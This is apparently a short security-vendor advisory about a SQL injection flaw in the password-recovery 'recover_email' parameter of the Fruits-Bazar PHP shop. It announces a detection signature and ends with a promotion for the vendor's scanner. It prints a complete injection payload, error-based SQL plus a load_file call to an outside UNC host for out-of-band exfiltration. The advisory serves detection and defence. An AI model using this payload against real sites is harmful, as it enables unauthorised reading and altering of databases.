Application Details
Fruits-Bazar is an eCommerce project developed using PHP, JavaScript, JQuery, and MySQL.
Vulnerability
Fruits-Bazar is vulnerable to SQL injection.
Identification
A remote attacker could send specially crafted SQL statements using the 'recover_email' parameter, which could allow the attacker to view, add, modify or delete information in the back-end database.
POST /index.php
PAYLOAD - recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net' (select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg')) '' AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mvga'='Mvga&u_pass_recover=Recover Password
Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to influence the vulnerable parameter with SQL injections.
Coverage
Idappcom has created signature 8022835 along with a traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability, or others, why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comentarios